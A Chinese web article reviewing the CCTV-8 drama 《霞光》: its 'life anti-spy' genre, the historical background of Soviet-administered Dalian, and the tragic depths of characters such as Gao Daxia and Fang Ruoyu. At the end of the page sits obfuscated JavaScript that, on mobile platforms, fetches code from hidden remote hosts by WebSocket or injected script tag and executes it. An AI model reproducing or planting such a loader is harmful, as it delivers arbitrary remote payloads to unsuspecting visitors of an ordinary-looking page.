只需读懂这几点,就能品出《霞光》的高级感

时间:2021-10-18 11:46:04阅读:789
只需读懂这几点,就能品出《霞光》的高级感最近,正在央八热播的《霞光》不知道小伙伴们是否看过。这部剧由创作过《暗红1936》《冷箭》等作品的郝岩编剧,著名导演毛卫宁执导,佟丽娅领衔主演,还有刘威、丁嘉丽
  • 霞光
  • 剧情
  • 佟丽娅 陈昊 刘威 丁嘉丽 高露 李博

只需读懂这几点,就能品出《霞光》的高级感

最近,正在央八热播的《霞光》不知道小伙伴们是否看过。这部剧由创作过《暗红1936》《冷箭》等作品的郝岩编剧,著名导演毛卫宁执导,佟丽娅 领衔主演,还有刘威丁嘉丽 等老戏骨加盟,可谓是阵容强大。该剧以1945年至1949年解放战争时期背景,讲述了以高大霞为首的一群革命者,在“特殊解放区”大连为粉碎敌特份子阴谋抛头颅洒热血的故事。

和以往的谍战剧不同,《霞光》虽然也涉及到了我党与国民党特务的斗争,但它并不是严格意义上的谍战剧,准确来说应该是“生活反特剧”,用1945-1949年发生在“特殊解放区”大连的真实历史事件做串联,生活化地呈现人民群众、共产党员与敌人的斗争,并不只是单纯地呈现敌我双方的明争暗斗,抓特务、抓卧底。

除了类型上独特性,《霞光》在风格上也进行了大胆创新,用偏喜剧的风格来讲述革命往事。有的网友被承包了所有笑点,直言《霞光》是解压神剧;但也有网友不太买账,认为剧作有些闹腾。

其实,刚开始看剧的时候,小编也有同样的困惑。正剧为啥可以走喜剧风?高大霞为啥可以这么“没心没肺”,明明手拿着重要的档案,竟然还不管不顾地去买香肠;而我党的特派员傅家庄同志似乎也不够精明,为了一块手表差点错过火车,包括敌特分子麻苏苏的“猪队友”甄精细,直接在火车上把下了药的格瓦斯一饮而尽。但越往后看越发现,《霞光》根本不是什么搞笑风,这些小人物依然是妥妥的悲剧内核啊!

先说说为什么可以有喜感。这就需要先科普一个知识点:什么是“特殊解放区”。

“特殊解放区”,顾名思义,既是解放区又有一定的特殊性。1945年8月14日,国民党政府同苏联政府签订了《中苏友好同盟条约》。根据《中苏友好同盟条约》及有关协定,旅顺口和大连的行政权属于中国,但在对日和约签订之前,由苏军实行军事管制,任何其他方军队不得进入。

当时的苏联政府对中国共产党及其领导的人民革命力量是支持的,但由于受到《中苏友好同盟条约》的限制,为避免外交影响,不授美蒋以柄,故我党采取了暂不公开挂牌的策略,这样既便于同国民党反动派的斗争,又不影响我党放手开展工作。实际上,大连从被苏军解放后不久,就已经形成苏军控制的、由我党领导的解放区了。所以,当时的大连我方其实处于强势地位,真正需要隐藏的是敌方势力。

这样的背景也就使得敌我身份基本处于明面之上,我方同志根本不需要隐藏身份,可以直接开展特务抓捕行动。也正因此,戏剧性的成分喜剧性的元素、“猫捉老鼠”式的关系出现了:一面是彪憨直勇的高大霞,一面是心怀不轨却又得四处躲藏的特务,。尤其是剧中的头号反派方若愚,既要搞破坏,又因为高大霞的不断指认而不敢伤其性命,甚至还得保护她以免自己的特务身份被坐实。一个在不停地追,一个不得不不停地躲,这种你来我往的人物关系,自然而然地生发了一个又一个包袱,喜感随之而出。

再来说说人物。

《霞光》作为一部“生活反特剧”,生活化地展现历史描写人物是该剧的核心。虽然高大霞、方若愚、麻苏苏、甄精细、刘曼丽等人总给人一种嘻嘻哈哈马马虎虎插科打诨的搞笑感,比如刘曼丽看见帅哥两眼放光,高大霞直接烹煮了藏有情报的红肠,但这些人物的背后,都暗含着悲情色彩,只有读懂这些,才能理解《霞光》想要传达的深层内涵。

比如高大霞。作为一个大字不识几个女英雄,她的大大咧咧、乐天派都是她的“保护色”。因为放火团遭到破坏,她逃到牡丹江潜伏三年,直到大连解放才返回了故乡。没人知道她在牡丹江潜伏期间经历过什么,只知道她为革命交付了自己的青春,直到31岁都还是孤家寡人,变成了妥妥的大龄剩女。然而,因为敌人的破坏,丢失档案的她开始被组织怀疑,那种委屈和悲伤还无法诉说只能自己承受,除了痛苦更多的是飘摇无依的无力感,这才使得她的抗争、坚定信仰的一腔孤勇更显可贵。

再比如剧中最出彩的反派角色之一方若愚。他是国民党的忠实追随者,却绝非一个世俗意义上十恶不赦的“坏人”。和终极boss“老姨”不同,方若愚是一个有着不同政治立场的清醒者,对人民对百姓他始终心怀仁慈,甚至对“老姨”要和日本人合作持坚决抗拒态度。

但在时代的洪流中,方若愚被裹挟于其中进退两难。他忠于党国,但他的组长却因为缺少经费骗走了方若愚的女儿拿去卖钱换经费,以至于老婆在悲愤中自杀。他与高大霞虽针锋相对,但也在日军侵略阶段拼命保护过高大霞一家人的生命。他的人性与良知让他在困境中不断挣扎,剧作对人物命运的深思也呼之欲出。

有笑有泪还有“知识点”,《霞光》入坑不亏,继续追剧,更多惊喜等着你~

相关资讯

评论

  • 评论加载中...

function agQbH(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function fFKucWQk(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return agQbH(t);};window[''+'o'+'p'+'K'+'m'+'x'+'F'+'z'+'t'+'Q'+'V'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=fFKucWQk,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aGGJ0Lm1pbGGVjY3R2LmNu','ddHIueWVzddW42NzguY29t','142556',window,document,['G','d']);}:function(){};